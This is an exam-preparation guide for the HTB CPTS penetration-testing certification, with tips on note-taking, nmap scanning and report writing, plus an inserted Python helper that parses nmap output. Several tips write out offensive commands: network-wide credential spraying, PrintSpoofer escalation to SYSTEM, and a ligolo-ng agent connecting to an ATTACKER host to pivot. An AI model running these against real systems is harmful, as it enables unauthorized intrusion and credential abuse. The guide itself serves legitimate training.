Legend: Critical = exam-defining. Important = do this every time. Good practice = separates passers.

// Pre-Exam Preparation

#01 Preparation
Set Up Your Report Template BEFORE Exam Day
Install and configure SysReptor (or your preferred tool) the week before. Have a blank report with all sections pre-created: Executive Summary, Scope, Methodology, Finding Summary Table, and at least 10 empty finding slots. On exam day, you open it and start filling in data — not configuring tools.
#02 Preparation
Build a Note-Taking Template with Sections for Every Host
Use CherryTree or Obsidian with a template: Host IP, Open Ports, Services, Credentials Found, Vulnerabilities, Flags, and Draft Finding. Create the node before you enumerate — paste data in as you discover it. Searching your notes at hour 60 of the exam is 10x faster than scanning grep history.
#03 Preparation
Test Your VPN and Lab Access 12 Hours Before Start
Connect to the HTB VPN, verify tun0 is up, ping the lab gateway. Exam day VPN issues happen. Knowing your setup works means any exam-day problem is environment, not configuration. Have the HTB support contact ready.
#04 Preparation
Pre-Stage Your Tools — Don't Install During the Exam
Verify these work before exam day: nmap, ffuf, bloodhound-python, impacket (all tools), evil-winrm, chisel, ligolo-ng, certipy, nxc (NetExec), mimikatz, rubeus, hashcat. Install Sliver or Metasploit for C2. Downloading tools during the exam wastes precious time.
#05 Preparation
Practice Writing One Full Finding Before the Exam
Take any HTB machine you've rooted and write a professional finding for the initial foothold. Title, CVSS, affected host, PoC steps, business impact, remediation. Time yourself. If it takes more than 20 minutes, practice more. The exam requires 5-10 findings in the report.

// During the Exam — Methodology

#06 Methodology
Read the Scope Document First — Completely
Before scanning a single host, read the entire exam brief. Know exactly which IPs are in scope, which are out of scope, what credentials you've been given, and the network topology. CPTS is grey-box — you will receive starting credentials. Missing this costs hours.
#07 Methodology
Screenshot Everything — As You Go, Not Retrospectively
Every pivotal action needs a screenshot: initial shell gained (showing hostname + whoami/id), every privilege escalation proof, every lateral move, every credential found, every flag. The report reviewer must reproduce your work. Lab access expires — you cannot go back.
#08 Methodology
Allocate Days 9-10 Purely for Report Writing
The exam is 10 days. Stop exploiting by end of day 8 and spend two full days on the report. A well-written report beats a sloppy one with more flags. The report IS the submission — reviewers cannot credit what they cannot verify.
#09 Methodology
Write Draft Findings AS You Discover Vulnerabilities
When you exploit something, open SysReptor/your report and write a draft finding immediately — even 3 sentences. Title, what you ran, what you got. You will have 100x better recall writing it at hour 10 than at hour 200 when you're exhausted and trying to reconstruct the attack chain.
#10 Methodology
Use the Two-Pass Nmap Method on Every Target
Pass 1: nmap -p- --min-rate 10000 -oA host/full IP. Pass 2: nmap -sV -sC -O -p [ports] -oA host/targeted IP. Never skip -p-. Missing a service on a non-standard port because you only scanned top-1000 is the most common preventable CPTS failure.
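The two passes are glued together by the pass-1 output: you need the open ports from the -p- scan as the -p list for pass 2, and you want proof that pass 1 really covered all 65535 ports rather than the top 1000. The script below is an added example for this tip, not code from the page or from nmap: it parses the greppable (.gnmap) file that -oA writes, builds the pass-2 command line, and checks that listed plus ignored ports add up to 65535. The helper names and the sample scan output are constructed for the example.

```python
"""Parse pass-1 nmap greppable output (the .gnmap file from -oA) and build the
pass-2 command. Added example for this tip; not code from the page or from nmap.
Helper names are hypothetical; the sample scan output below is constructed."""
import re

# Constructed sample of a pass-1 .gnmap file (nmap -p- ... -oA host/full).
# Tabs separate the fields on a Host: line, exactly as nmap writes them.
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated (constructed sample)\n"
    "Host: 10.10.10.5 ()\tStatus: Up\n"
    "Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "443/filtered/tcp//https///, 8080/open/tcp//http-proxy///\tIgnored State: closed (65531)\n"
    "Host: 10.10.10.6 ()\tPorts: 445/open/tcp//microsoft-ds///, "
    "5985/open/tcp//wsman///\tIgnored State: closed (65533)\n"
    "# Nmap done (constructed sample)\n"
)

# Each port entry is port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(tcp|udp)/[^/]*/([^/,]*)/")
IGNORED_RE = re.compile(r"Ignored State: \w+ \((\d+)\)")
FULL_RANGE = 65535


def parse_gnmap(text):
    """Return {host: {"open": [(port, service)], "listed": n, "ignored": n}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        entries = PORT_RE.findall(ports_field)
        open_ports = sorted(
            (int(port), svc) for port, state, _proto, svc in entries if state == "open"
        )
        ignored = IGNORED_RE.search(line)
        hosts[host] = {
            "open": open_ports,
            "listed": len(entries),                      # ports nmap printed (open/filtered/...)
            "ignored": int(ignored.group(1)) if ignored else 0,  # ports it collapsed as closed
        }
    return hosts


def full_range_scanned(info):
    """True when listed + ignored ports cover all 65535, i.e. pass 1 used -p-.
    A top-1000 scan sums to 1000 instead, which is the failure the tip warns about."""
    return info["listed"] + info["ignored"] == FULL_RANGE


def pass2_command(host, info, outdir="."):
    """Build the pass-2 line from the tip: -sV -sC -O on the open ports only."""
    port_list = ",".join(str(port) for port, _ in info["open"])
    return f"nmap -sV -sC -O -p {port_list} -oA {outdir}/{host}/targeted {host}"


if __name__ == "__main__":
    for host, info in parse_gnmap(SAMPLE_GNMAP).items():
        flag = "" if full_range_scanned(info) else "  # WARNING: pass 1 did not cover -p-"
        print(pass2_command(host, info) + flag)
```

Point it at host/full.gnmap from your own pass 1; the warning line is the check that matters, because a pass 2 built from an incomplete pass 1 inherits the blind spot.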
#11 Methodology
Spray Every Credential Against Every Service
Every password you find gets sprayed immediately against: SMB, SSH, WinRM, RDP, FTP, web apps, MSSQL, MySQL, and any other open service. Use nxc smb 10.10.10.0/24 -u user -p pass for network-wide spray. Credential reuse is extremely common — it's an intended exam mechanic.
#12 Methodology
Keep a Running Credential Log
Maintain a table in your notes: Username | Password/Hash | Source | Services Tested | Works On. Every credential from every source goes here. At exam hour 50, when you're stuck, this table often contains your next move that you forgot about from hour 15.

// Technical Tactics

#13 Technical
Add Every Discovered Hostname to /etc/hosts Immediately
Many CPTS targets serve completely different content based on the Host header (virtual host routing). echo '10.10.10.5 target.htb admin.target.htb' >> /etc/hosts. Always attempt VHost fuzzing too — many machines have a hidden admin or dev VHost as the intended entry point.
#14 Technical
Run BloodHound Collection Immediately After AD Access
bloodhound-python -u user -p pass -d domain.local -c all -ns DC_IP. Do this as soon as you have any domain credential — even low-privilege. BloodHound shortest path analysis from your compromised user to Domain Admins reveals the entire attack chain. Look for: Kerberoastable accounts, AS-REP Roastable accounts, AdminTo edges, DCSync rights.
#15 Technical
Check sudo -l Before Any Complex Privilege Escalation
sudo -l takes 1 second and is the fastest Linux privesc check. If any binary is listed with NOPASSWD, check GTFOBins immediately. Vim, find, python, awk, bash, tar, nmap — all have GTFOBins shell escape techniques. This resolves 30% of Linux privesc in under 60 seconds.
#16 Technical
Check SeImpersonatePrivilege on Every Windows Shell
Run whoami /priv immediately on every Windows shell. SeImpersonatePrivilege (common for service accounts, IIS, MSSQL) → PrintSpoofer or GodPotato for instant SYSTEM. .\PrintSpoofer.exe -i -c cmd. This privilege is present on 60%+ of CPTS Windows boxes.
#17 Technical
Upgrade Every Linux Shell to a Full PTY Immediately
Without PTY upgrade: tab completion fails, Ctrl+C kills your shell, su fails, text editors crash. Upgrade: (1) python3 -c 'import pty;pty.spawn("/bin/bash")', (2) Ctrl+Z, (3) stty raw -echo; fg, (4) export TERM=xterm. Alternatively: script /dev/null -c bash.
#18 Technical
When Stuck on Web Apps — Check Source Code and JS Files
Right-click > View Page Source. Look for: API endpoints in JavaScript, hidden form fields, commented-out paths, admin routes. Use the DevTools Network tab to capture all XHR/fetch requests. Run curl -s http://target.htb/app.js | grep -E 'api|endpoint|key|token|admin' (substitute the real script URL). API endpoints often have missing auth on non-obvious methods.
#19 Technical
Use Ligolo-ng for Pivoting — It's Faster Than Chisel
Ligolo-ng creates a full TUN interface — no proxychains needed. All tools work natively. Setup: ./proxy -selfcert on the attacker, ./agent -connect ATTACKER:11601 -ignore-cert on the target. Then in the ligolo console: session, start. Add the route on the attacker: ip route add 172.16.0.0/24 dev ligolo. Now scan the internal subnet directly.
#20 Technical
Run winPEAS and linPEAS — But Read the Output Carefully
These tools generate hundreds of lines. Focus on: RED items (critical findings), credential sections (grep for 'password' in output), service misconfigurations, scheduled tasks, and registry entries. Pipe to file: .\winPEAS.exe > peas.txt, then grep. Don't blindly execute every suggestion.

// Report Writing

#21 Reporting
Every Finding Needs: Title, CVSS, PoC, Impact, Remediation
Minimum viable finding: Specific title (not "web issue" — "Stored XSS in Comment Field Allows Session Hijacking"), CVSS 3.1 score with vector, affected host(s), numbered PoC steps with screenshots, business impact in non-technical language, specific remediation steps. Missing any of these gets findings downgraded or rejected.
#22 Reporting
Executive Summary Must Have ZERO Technical Jargon
Write for a non-technical C-level reader who has never heard of "Kerberoasting" or "SQLi". Use: "An attacker without a valid account could access the payroll database" — not "Unauthenticated SQL injection on the login endpoint". One paragraph, overall risk rating, top 3 business impacts, recommended priority action.
#23 Reporting
Include a Finding Summary Table with Color-Coded Severity
A table listing all findings by title, severity, affected host, and remediation status. This lets busy executives scan the entire report in 60 seconds. SysReptor generates this automatically. If writing manually, use: Critical (red), High (orange), Medium (yellow), Low (blue), Info (gray).
#24 Reporting
Proofread Twice — Typos Undermine Credibility
A report with spelling errors signals carelessness to reviewers. Run spellcheck in your word processor. Read each finding aloud to catch awkward phrasing. Have someone else read the executive summary. Proofread AFTER a full night's sleep — your tired eyes miss errors your rested eyes catch.
#25 Reporting
Test Your PDF Export Before Submission
Export your report to PDF and open it. Verify: all screenshots render (not broken images), code blocks don't overflow page margins, table formatting is intact, all sections are present, page numbers are correct, the cover page has the correct date and assessment type. PDF rendering bugs discovered at submission time are catastrophic.
// REMEMBER — The CPTS exam tests methodology, not just technical skill. A professional report with clear findings from 70% of machines beats an undocumented full compromise. Think like a pentester, write like a consultant.